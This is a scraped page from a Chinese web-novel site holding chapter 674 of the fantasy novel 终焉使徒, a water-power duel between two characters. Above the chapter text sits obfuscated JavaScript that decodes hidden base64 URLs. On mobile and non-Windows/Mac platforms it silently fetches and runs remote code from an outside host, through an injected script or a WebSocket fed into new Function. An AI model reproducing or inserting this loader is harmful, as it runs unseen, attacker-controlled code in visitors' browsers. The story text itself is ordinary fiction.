笔趣阁

字:
关灯 护眼
笔趣阁 > 终焉使徒 > 第六百七十四章 超临界水
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第六百七十四章 超临界水

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
能级三初阶尚不足以支撑使徒在根本上改变肉身。
  
  像刚才这种完全元素化身躯以躲避伤害的方式,云从龙用起来还无法念发力至、如臂指使。
  
  所以他仍然受伤了。
  
  另一边,金针封印剥夺了申易安的部分绝技,但其神通量依然十倍于对手。
  
  双方的战斗看起来不甚激烈。
  
  然而每一秒,肉眼看不见的神通力对耗都在战场所有水体中展开。
  
  “十六岁,竟然能与本座交手。”
  
  申易安踏着水面,缓步前压。
  
  “如此天才,可惜是生在别家……”
  
  其头顶,贯穿脑域的金针已经弹出四分之一,其上缠绕的幽蓝水光逐渐混浊。
  
  他被束缚在棺内不知年岁,甫一出关,感慨尤多。
  
  但少年人不理解,也不屑理解对方。
  
  “少啰嗦了!”
  
  云从龙抹去嘴角血迹,主动进攻。
  
  每一步迈出,水面都会隆起斜面,主动送到其足下。
  
  就像是起跑器一般。
  
  水汽在他身旁汇聚环绕,最后液化为共工形象的身外化身。
  
  “喝啊!”
  
  一声暴喝清脆,水凝成的共工半身挥出长拳。
  
  申易安双手抱臂,身形不动。
  
  八条天吴水尾自他身后扬起,其中之一朝前劈出,将拳头隔开。
  
  震波卷起米许高的矮浪,四面披靡。
  
  第二拳又至。
  
  音速级别的水体碰撞,溅出无数子弹般的液滴,将谷地两旁的山林摧折击碎。
  
  几乎是眨眼功夫,连续八记重拳被一一开格卸劲。
  
  正是共工水化身中门大开、云从龙再衰三竭的时候,申易安解开抱着的双臂,进步出拳。
  
  这一拳命中少年本体X型交错的臂盾,将之强硬震开。
  
  然后,附着在拳峰与小臂上的水膜,朝前奔流爆发。
  
  这道涌泉先是撞在云从龙胸膛,打得他口喷鲜血,又在动能伤害穷尽后主动消解表面应力,散作千万锋利银丝,冲刷过后者体表。
  
  明光于一瞬化作无数闪烁。
  
  少年衣服寸寸裂解如蝶,在同能级中可谓强大的肉身被开出大量平整开口。
  
  水线过处,皮肉分开,血液被抽走。
  
  创处惨白泡发,好似一张张鱼嘴。
  
  当是时,申易安的初始拳劲才全面爆发,将云从龙轰飞。
  
  金针弹出近半。
  
  位格上的优势,终究弥补不了能级的绝对差距。
  
  “抱歉了……”
  
  足尖发力,威风侯追风破浪,打算终结猎物。
  
  距离拉近,风水顿开。
  
  申易安瞳孔猛然收缩。
  
  他看到贴水倒飞的云从龙脖颈间绳索断裂。
  
  其下悬吊着的一枚干瘪人指被少年叼在嘴里,嚼碎吞下。
  
  在这一瞬间,数倍于前的共工神通气息爆开——云从龙竟被推动着强行进入一阶超负荷。
  
  他的牙齿锐化,满头短发如钢针般倒竖,四肢上更是多出了数个黝深空腔,水汽于其中高速周转不休。
  
  开战到现在,申易安第一次失去了对身周水体的感应。
  
  这也让他霎时了然那枚断指的来历——它必定来自于云家某一位战争级共工使徒的尸身。
  
  “感受水的极限吧!”
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师